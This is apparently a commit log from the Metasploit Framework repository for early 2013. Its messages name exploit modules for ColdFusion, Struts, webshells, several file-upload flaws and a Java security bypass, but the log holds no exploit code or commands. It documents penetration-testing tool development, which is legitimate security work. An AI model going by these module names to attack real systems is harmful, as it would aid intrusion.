Not complete but will currently get command execution on Coldfusion 9.x
instances with CSRF protection disabled
2013-04-06 20:08:50 -07:00
jvazquez-r7 358c43f6f6 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-04-03 19:17:53 +02:00
Tod Beardsley e4d901d12c Space at EOL (msftidy) 2013-04-03 09:20:01 -05:00
jvazquez-r7 070fd399f2 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-03-31 20:23:08 +02:00
jvazquez-r7 315abd8839 fix Privileged field 2013-03-30 19:39:01 +01:00
jvazquez-r7 a46805d95d description updated 2013-03-30 19:36:35 +01:00
jvazquez-r7 c880a63e75 Added module for ZDI-13-049 2013-03-30 19:35:04 +01:00
jvazquez-r7 224188ddf6 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-03-29 21:49:40 +01:00
jvazquez-r7 714fc83cfe Merge branch 'Ra1NX_pubcall' of https://github.com/bwall/metasploit-framework into bwall-Ra1NX_pubcall 2013-03-29 19:58:06 +01:00
bwall 21ea1c9ed4 Merge branch 'Ra1NX_pubcall' of https://github.com/bwall/metasploit-framework into Ra1NX_pubcall 2013-03-29 13:29:38 -04:00
bwall 10d9e86b42 Renamed file to be all lower case 2013-03-29 13:29:05 -04:00
jvazquez-r7 cd1820d769 trying to solve irc comm issues 2013-03-29 12:54:57 +01:00
bwall 6cf44d9c85 added a 3 message window for recieving the check response 2013-03-28 21:14:52 -04:00
jvazquez-r7 e9842eac2e Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-03-28 15:18:41 +01:00
jvazquez-r7 29ad9939e1 cleanup for stunshell_eval 2013-03-28 15:11:20 +01:00
jvazquez-r7 514aed404c Merge branch 'STUNSHELL_eval' of https://github.com/bwall/metasploit-framework into bwall-STUNSHELL_eval 2013-03-28 15:10:57 +01:00
jvazquez-r7 3ffbc5e5b3 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-03-28 14:58:43 +01:00
jvazquez-r7 9b18eb858b cleanup for stunshell_exec 2013-03-28 14:45:51 +01:00
jvazquez-r7 a7a5569725 Merge branch 'STUNSHELL_exec' of https://github.com/bwall/metasploit-framework into bwall-STUNSHELL_exec 2013-03-28 14:45:28 +01:00
jvazquez-r7 6cd6a7d6b9 Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-03-28 12:16:18 +01:00
bwall ce9f11aeb3 Changed the targets to be more specific 2013-03-27 17:22:29 -04:00
bwall f14d5ba8ec Removed extra comma 2013-03-27 17:15:34 -04:00
bwall 2a60ef2d60 Renamed and fixed some code issues 2013-03-27 17:14:41 -04:00
bwall cc92b54e83 Moved module and cleaned code 2013-03-27 17:03:18 -04:00
bwall 76fb6ff48f Updated ranking 2013-03-27 16:41:35 -04:00
jvazquez-r7 e25a06c649 delete comma 2013-03-27 21:33:58 +01:00
jvazquez-r7 5fc5a4f429 use target_uri 2013-03-27 20:45:34 +01:00
jvazquez-r7 f29cfbf393 cleanup for v0pCr3w_exec 2013-03-27 20:38:11 +01:00
bwall fd302d62b8 Removed testing code 2013-03-27 12:50:42 -04:00
jvazquez-r7 787f8cc32f up to date 2013-03-26 12:18:53 +01:00
jvazquez-r7 6f5fc77019 up to date 2013-03-26 11:59:41 +01:00
jvazquez-r7 2d0a813aa6 Merge branch 'heyder-joomla' of https://github.com/heyder/metasploit-framework 2013-03-26 11:23:33 +01:00
bwall a5346240de Updated v0pCr3w_exec to use send_request_cgi 2013-03-26 01:33:30 -04:00
heyder 014c01099e improve cleanup 2013-03-26 02:22:10 -03:00
bwall 5218831167 Added license information and tidied up the code 2013-03-25 00:05:31 -04:00
bwall e98a463de2 Added license information and tidied up code 2013-03-25 00:04:39 -04:00
bwall e37fa3b40a Added license information and tidied up code 2013-03-25 00:03:32 -04:00
bwall 6be88224bf Added the license information and tidied up 2013-03-25 00:01:20 -04:00
heyder 0c169f94eb correct some bad indent 2013-03-24 21:07:51 -03:00
heyder 50ac5cf247 Adjust payload size and others code adjustments 2013-03-24 20:25:29 -03:00
bwall 7e0b0ac092 Added STUNSHELL webshell remote command execution module 2013-03-24 15:18:08 -04:00
bwall b23d259485 Added STUNSHELL webshell remote code evaluation[PHP] module 2013-03-24 15:16:45 -04:00
bwall bbcf21ee24 Added v0pCr3w webshell remote command execution module 2013-03-24 15:13:42 -04:00
bwall ca6ab7c8c2 Added Ra1NX pubcall authentication bypass exploit module 2013-03-24 14:59:27 -04:00
jvazquez-r7 cb56b2de4b Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2013-03-23 20:06:05 +01:00
heyder 5bee1471df many code adjustments 2013-03-22 23:07:08 -03:00
sinn3r 11754f271a Merge branch 'mutiny_subnetmask_exec' of github.com:jvazquez-r7/metasploit-framework into jvazquez-r7-mutiny_subnetmask_exec 2013-03-22 13:05:16 -05:00
heyder b5c65ad51b add Joomla Component JCE File Upload Code Execution 2013-03-22 10:41:35 -03:00
jvazquez-r7 bbff20fd65 cleanup for struts_code_exec_parameters 2013-03-21 22:17:47 +01:00
jvazquez-r7 50c6a98530 Merge branch 'struts-param-rce' of https://github.com/Console/metasploit-framework into Console-struts-param-rce 2013-03-21 22:17:20 +01:00
jvazquez-r7 296f2e7c2c up to date 2013-03-21 22:10:18 +01:00
Console cbccda10ca fixing issue raised by @meatballs1 2013-03-21 20:58:40 +00:00
jvazquez-r7 9c1694e8a0 Merge branch 'struts-param-rce' of https://github.com/Console/metasploit-framework 2013-03-21 20:44:10 +01:00
Console 302193f98b Various fixes and improvements
Chunk_length now varies according to targeturi and parameter
A few typographical inconsistences corrected
CMD option removed as its not being used
custom http request timeout removed
2013-03-21 19:03:39 +00:00
Console 8027615608 fixed comments left in by accident 2013-03-21 16:43:44 +00:00
Console 4edf5260f4 check function now tells user about delay 2013-03-21 16:40:45 +00:00
Console a714b430ca used normalize_uri 2013-03-21 14:05:08 +00:00
Console 5c9bec1552 commit fix branch for Console-struts-RCE 2013-03-21 13:40:16 +00:00
jvazquez-r7 29fff62869 up to date 2013-03-12 18:29:53 +01:00
Darren Martyn 73717f1522 Added webacoo code execution module 2013-03-09 19:12:22 +00:00
Spencer McIntyre 8b5a83c7f5 Remove the DECODER option 2013-03-08 15:25:16 -05:00
James Lee 2160718250 Fix file header comment
[See #1555]
2013-03-07 17:53:19 -06:00
jvazquez-r7 25db782b03 change print location 2013-03-07 19:15:40 +01:00
jvazquez-r7 fdd7c375ad added linux native target 2013-03-07 19:12:25 +01:00
David Maloney 4212c36566 Fix up basic auth madness 2013-03-01 11:59:02 -06:00
David Maloney c290bc565e Merge branch 'master' into feature/http/authv2 2013-02-28 14:33:44 -06:00
Joe Rozner abdcde06cd Fix polarcms_upload_exec exploit 2013-02-25 22:58:26 -08:00
sinn3r 181e3c0496 Uses normalize_uri 2013-02-25 19:36:48 -06:00
sinn3r 1ed74b46be Add CVE-2013-0803
From:
http://dev.metasploit.com/redmine/issues/7691
2013-02-25 14:14:57 -06:00
sinn3r f3f913edc5 Correct bad naming style 2013-02-25 13:29:27 -06:00
sinn3r 690e7ec8a7 Uses normalize_uri 2013-02-25 13:28:00 -06:00
sinn3r b930613653 Merge branch 'kordil-edms-upload-exec' of github.com:bcoles/metasploit-framework into bcoles-kordil-edms-upload-exec 2013-02-25 12:43:50 -06:00
sinn3r 5fe2c26d82 Merge branch 'bcoles-glossword_upload_exec' 2013-02-25 12:41:05 -06:00
sinn3r 52241b847a Uses normalize_uri instead of manually adding a slash 2013-02-25 12:20:37 -06:00
bcoles d7c0ce4e4a Fix 'check()' in glossword_upload_exec 2013-02-25 15:52:07 +10:30
bcoles 1f46b3aa02 Add Glossword Arbitrary File Upload Vulnerability exploit 2013-02-25 01:59:46 +10:30
bcoles 002654317c Add Kordil EDMS File Upload Vulnerability exploit 2013-02-22 23:32:17 +10:30
jvazquez-r7 1913d60d65 multibrowser support 2013-02-21 01:13:25 +01:00
jvazquez-r7 bf216cca5c description and references updated 2013-02-20 18:14:53 +01:00
jvazquez-r7 d7b89a2228 added security level bypass 2013-02-20 17:50:47 +01:00
jvazquez-r7 d88ad80116 Added first version of cve-2013-0431 2013-02-20 16:39:53 +01:00
David Maloney 0ae489b37b last of revert-merge snaffu 2013-02-19 23:16:46 -06:00
James Lee 9d4a3ca729 Fix a typo that broke this module against x64
[SeeRM #7747]
2013-02-19 19:22:42 -06:00
jvazquez-r7 221ce22f53 make msftidy happy 2013-02-15 19:01:58 +01:00
Tod Beardsley 8ddc19e842 Unmerge #1476 and #1444
In that order. #1476 was an attempt to salvage the functionality, but
sinn3r found some more bugs. So, undoing that, and undoing #1444 as
well.

First, do no harm. It's obvious we cannot be making sweeping changes in
libraries like this without a minimum of testing available. #1478 starts
to address that, by the way.

FixRM #7752
2013-02-11 20:49:55 -06:00
James Lee 5b3b0a8b6d Merge branch 'dmaloney-r7-http/auth_methods' into rapid7 2013-02-08 12:45:35 -06:00
James Lee 9b6f2fcd1d Use the install path to tell us the separator
Fixes the java target on windows victims
2013-02-08 12:10:42 -06:00
James Lee 5b398076ae Couple of fixes for windows
* Catch IOError when chmod doesn't exist (i.e. Windows)
* Proper escaping for paths
2013-02-08 11:52:50 -06:00
James Lee 071df7241b Merge branch 'rapid7' into sonicwall_gms
Conflicts:
	modules/exploits/multi/http/sonicwall_gms_upload.rb

Adds a loop around triggering the WAR payload, which was causing some
unreliability with the Java target.
2013-02-07 21:53:49 -06:00
James Lee 1f9a09d5dd Add a method to upload and exec in one step 2013-02-07 21:09:32 -06:00
James Lee 13d1045989 Works for java and native linux targets 2013-02-07 16:56:38 -06:00
James Lee b6c6397da3 typo 2013-02-06 19:21:20 -06:00
James Lee 1095fe198b Merge branch 'rapid7' into dmaloney-r7-http/auth_methods 2013-02-06 16:57:50 -06:00
HD Moore 80a8bab02f Correct the CVE reference 2013-02-05 10:37:24 -06:00
sinn3r 42912bf286 Merge branch 'jjarmoc-rails_methods' of github.com:jjarmoc/metasploit-framework into jjarmoc-jjarmoc-rails_methods 2013-02-04 16:50:01 -06:00
Jeff Jarmoc 9b30e354ea Updates HTTP_METHOD option to use OptEnum. 2013-02-04 15:32:36 -06:00
sinn3r 45db43d2b3 Merge branch 'msftidy/no-twitter-handles' of github.com:todb-r7/metasploit-framework into todb-r7-msftidy/no-twitter-handles 2013-02-04 14:21:40 -06:00
David Maloney 8d013d1034 Merge branch 'master' into http/auth_methods 2013-02-04 13:11:57 -06:00
David Maloney 4c1e630bf3 BasicAuth datastore cleanup
cleanup all the old BasicAuth datastore options
2013-02-04 13:02:26 -06:00
HD Moore 4c8811bb8a Add a debug target 2013-02-03 23:24:44 -06:00
HD Moore 191eed88bc Fix liberal matching expression on target 2013-02-03 21:50:03 -06:00
HD Moore 9379c68e51 Fix typo, auto-fingerprint, unconnected sockets 2013-02-03 21:23:05 -06:00
HD Moore 42c8a2d265 Add VU and blog references 2013-02-03 18:17:51 -06:00
HD Moore c24da99104 Update authors, add Richard (thanks!) 2013-02-03 18:13:28 -06:00
HD Moore 9e491f0b1c Add a fingerprint string and more comments 2013-02-03 18:03:32 -06:00
HD Moore 1f227243b8 Make it clear BadChars are ignored 2013-02-03 17:54:25 -06:00
HD Moore 214a60aa01 iFix spacing 2013-02-03 17:52:33 -06:00
HD Moore 94953d0450 Fix idents from copypasta 2013-02-03 17:48:13 -06:00
HD Moore 975230c9e7 Add the first module for unique_service_name() 2013-02-03 17:46:20 -06:00
RageLtMan ffb88baf4a initial module import from SV rev_ssl branch 2013-02-03 15:06:24 -05:00
Tod Beardsley e8def29b4f Dropping all twitter handles
Also adds "pbot" as an accepted lowercase word. This will come up pretty
routinley for functions and stuff.
2013-02-01 16:33:52 -06:00
jvazquez-r7 70b252dc7b Merge branch 'normalize_uri_update2' of https://github.com/wchen-r7/metasploit-framework into wchen-r7-normalize_uri_update2 2013-01-31 22:32:50 +01:00